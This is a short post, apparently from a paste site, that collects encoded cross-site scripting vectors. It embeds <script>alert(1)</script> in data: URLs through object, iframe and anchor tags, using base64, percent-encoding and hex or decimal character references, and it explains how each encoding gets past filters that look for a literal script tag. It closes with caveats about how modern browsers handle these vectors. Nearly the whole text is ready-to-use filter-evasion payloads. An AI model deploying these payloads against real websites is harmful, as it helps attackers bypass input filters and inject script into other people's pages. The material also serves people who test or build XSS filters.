
Encoded XSS Vectors

Posted by a guest, Feb 19th, 2013
Each vector below loads a data: URL whose body is the HTML document <script>alert(1)</script>, with that body encoded so that a filter looking for the literal string "<script>" in the page source never sees it. The browser first decodes the attribute value (HTML character references) and then the data: URL body (percent-encoding or base64) before parsing the result as HTML, so the payload is only reconstructed after the filter has already run.

Base64 Encoded Vector:
---------------------
<object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg== ></object>

where the base64 encoded value PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg== decodes to
<script>alert(1)</script>

The ;base64 parameter in the data: URL tells the browser to base64-decode the body before parsing it as text/html.

URL Encoded Vector:
-------------------
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>

where %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E percent-decodes to
<script>alert(1)</script>

A variation of the above in which only the angle brackets are encoded, which is already enough to evade a filter regular expression that looks for a literal <script> tag:

<iframe src="data:text/html,%3Cscript%3Ealert(1)%3C/script%3E"></iframe>

Hex Entities Encoded Vector:
---------------------------
<a href="data:text/html;blabla,&#x3C;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3E;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x3C;&#x2F;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3E;">X</a>

where the hexadecimal character references &#x3C;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3E;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x3C;&#x2F;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3E; decode to
<script>alert(1)</script>

Here nothing is percent-encoded: the HTML parser decodes the character references while reading the href attribute value, so the URL the browser actually follows is data:text/html;blabla,<script>alert(1)</script>. The ;blabla is an unknown media-type parameter that the browser simply ignores.

Decimal Entities Encoded Vector:
-------------------------------
<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#62&#97&#108&#101&#114&#116&#40&#49&#41&#60&#47&#115&#99&#114&#105&#112&#116&#62">X</a>

where the decimal character references &#60&#115&#99&#114&#105&#112&#116&#62&#97&#108&#101&#114&#116&#40&#49&#41&#60&#47&#115&#99&#114&#105&#112&#116&#62 decode to
<script>alert(1)</script>

Note that the terminating semicolons are omitted here. HTML parsers accept numeric character references without the semicolon, which defeats filters that only recognise the &#NN; form.

Caveats:
--------
In current browsers a document loaded from a data: URL gets an opaque (unique) origin, so alert(1) fires but the script cannot read the embedding page's DOM, cookies or storage. Older versions of Firefox let data: URLs inherit the origin of the document that created them, which is what made these vectors a full XSS rather than just a pop-up.

Current Chrome and Firefox also block top-level navigation to text/html data: URLs, so the <a href="data:..."> vectors no longer execute when the link is clicked. The <iframe> and <object> forms still load the document in a nested browsing context.